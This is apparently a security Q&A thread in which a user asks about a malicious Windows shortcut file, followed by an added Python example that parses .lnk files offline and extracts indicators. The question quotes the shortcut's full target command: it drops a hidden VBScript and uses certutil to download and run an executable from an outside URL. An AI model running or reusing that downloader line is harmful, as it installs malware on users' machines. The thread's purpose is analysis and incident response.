1

I received a link file masquerading as a text file. By mistake I clicked it, and suddenly a command prompt opened. Surprised at the unexpected behavior, I closed that window. Upon inspecting the file, it had a .lnk extension. While a normal .lnk file is a few bytes in size, this one was a few hundred MB.

Inspecting the details of the .lnk file, the Target field contained the following command:

%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?di1708e9xmgN9OFQ=amusers_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"

while the "Start in" field had:

"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

I need some help understanding what this code fragment does and, if possible, how to check whether anything bad has happened and how to undo the changes.

Windows 8 system, if in any way relevant. Let me know if any other information is needed.

Frash
  • 111
  • 3
  • It looks like an attempt at silently installing a software, and the method makes it suspicious indeed. Go to your startup folder via the "shell:startup" command in the Run box to make sure no program has been added there; also check in the "shell:common startup" folder for good measure and, provided you have admin rights, delete whatever's there that shouldn't be. Then run a complete antivirus scan, preferably on startup (offline mode in Windows Defender, startup scan on Avast, etc...) or via a USB recovery tool like EEK (https://www.emsisoft.com/en/home/emergencykit/). –  May 21 '20 at 06:30
  • I had checked both the places you've mentioned; there was nothing. I tried to check the URL it was downloading from; the file looked like a lot of junk characters. Also, as far as I can tell, `ComSpec` is a replacement for `cmd.exe`. Any idea what that `CreateObject` does and how? – Frash May 21 '20 at 06:46
  • CreateObject is a Visual Basic Script command, so it can be invoked in a script to create pretty much anything: folder, file, registry entry, you name it. Alone, it doesn't mean or do anything, though; there has to be a string behind it that will name the object that's being created, what it does, where it's going to be stored, etc... ComSpec is used as a way of cmd.exe for some internal (as in, "same directory") commands such as "copy", "DIR" (to list directories and their content), "RD" (to remove/delete empty directories), etc... External commands apply to other objects. –  May 21 '20 at 07:30
  • You really should scan your machine with an offline antivirus / antimalware tool as thoroughly as possible (all internal and external drives should be scanned too), to make sure no infection has been perpetrated. –  May 21 '20 at 07:33
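The following is an added example, not code from the question or from any commenter, showing how to triage a shortcut like the one quoted above without double-clicking it. It reads the MS-SHLLINK header, skips the LinkTargetIDList and LinkInfo structures, pulls out the "Start in" (WORKING_DIR) and COMMAND_LINE_ARGUMENTS strings, walks the ExtraData blocks and reports how many bytes follow the terminal block, then expands the %VARS% with a constructed environment and extracts the URL and the dropped file names. Read that way, the quoted target line does the following: cmd.exe echoes a one-line VBScript into %USERNAME%.vbs in the Start-in folder (the user's Startup folder), runs it, and that script uses WScript.Shell.Run with window style 0 (hidden) to delete the .vbs, fetch %USERNAME%.exe with certutil -urlcache from the URL shown, and execute it. The sample shortcut built here is constructed: it stores the whole target line in the arguments field (a real file keeps the executable path in the ID list or LinkInfo), uses made-up values for COMSPEC, USERNAME, PROCESSOR_ARCHITECTURE and APPDATA, and appends 4 KiB of zero padding after the terminal block to stand in for the oversized file the question describes; what actually fills the real file's hundreds of megabytes is not known from the page.

```python
"""Offline triage of a Windows shortcut (.lnk, MS-SHLLINK).

Added example, not code from the post: parses the ShellLinkHeader, skips the
LinkTargetIDList and LinkInfo, reads the StringData fields, walks ExtraData,
reports bytes past the terminal block, then expands %VARS% with a constructed
environment and extracts URLs and dropped file names from the command line."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the string fields, ShowCommand and the byte count after ExtraData."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]  # 1 normal, 3 max, 7 minimised
    pos = 76
    if flags & HAS_ID_LIST:        # IDListSize (2 bytes) followed by the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show_command}
    for flag, name in STRING_FIELDS:  # CountCharacters (2 bytes) + characters
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    while pos + 4 <= len(data):    # ExtraData blocks; a BlockSize below 4 terminates
        size = struct.unpack_from("<I", data, pos)[0]
        pos += size if size >= 4 else 4
        if size < 4:
            break
    info["trailing_bytes"] = len(data) - pos  # junk/padding after the terminal block
    return info


def expand(text: str, env: dict) -> str:
    """Expand %VAR% references from a supplied (not the live) environment."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), text)


def extract_iocs(arguments: str, env: dict) -> dict:
    """Pull the indicators a responder wants out of the expanded command line."""
    cmd = expand(arguments, env)
    return {
        "urls": re.findall(r"https?://[^\s\"']+", cmd),
        "files": sorted(set(re.findall(r"[\w.-]+\.(?:exe|vbs|bat|ps1|dll|js)", cmd, re.I))),
        "downloader": "certutil -urlcache" in cmd.lower(),
        # WScript.Shell.Run(command, 0): window style 0 runs the child hidden
        "hidden_window": bool(re.search(r"\.Run\b.*,\s*0\b", cmd)),
        "drops_script": bool(re.search(r"\becho\b.*>\s*\"?[^\s\"]+\.vbs", cmd, re.I)),
    }


def build_sample_lnk(working_dir: str, arguments: str, padding: int = 4096) -> bytes:
    """Constructed sample: empty ID list, Unicode Start-in and arguments,
    a terminal block, then `padding` zero bytes standing in for junk."""
    flags = HAS_ID_LIST | IS_UNICODE | 0x10 | 0x20
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = 1 (normal)
    id_list = struct.pack("<H", 2) + b"\x00\x00"        # only the TerminalID

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return (header + id_list + string_data(working_dir) + string_data(arguments)
            + struct.pack("<I", 0) + b"\x00" * padding)


# The target line and Start-in folder as quoted in the question.
TARGET_LINE = r'%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?di1708e9xmgN9OFQ=amusers_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"'
START_IN = r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed environment (assumed values, not from the page).
SAMPLE_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe", "USERNAME": "alice",
              "PROCESSOR_ARCHITECTURE": "AMD64",
              "APPDATA": r"C:\Users\alice\AppData\Roaming"}

if __name__ == "__main__":
    lnk = parse_lnk(build_sample_lnk(START_IN, TARGET_LINE))
    print("Start in :", expand(lnk["working_dir"], SAMPLE_ENV))
    print("Trailing :", lnk["trailing_bytes"], "bytes after the terminal block")
    for key, value in extract_iocs(lnk["arguments"], SAMPLE_ENV).items():
        print(f"{key:14}: {value}")
```

To use it on a real file, replace the constructed sample with `parse_lnk(open(path, "rb").read())` on a copy of the shortcut and supply the victim's values for the four variables; the expanded `working_dir` is the folder to inspect for `<username>.exe`, and the extracted URL and file names are what to search for in proxy logs, Prefetch and the certutil URL cache.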

0 Answers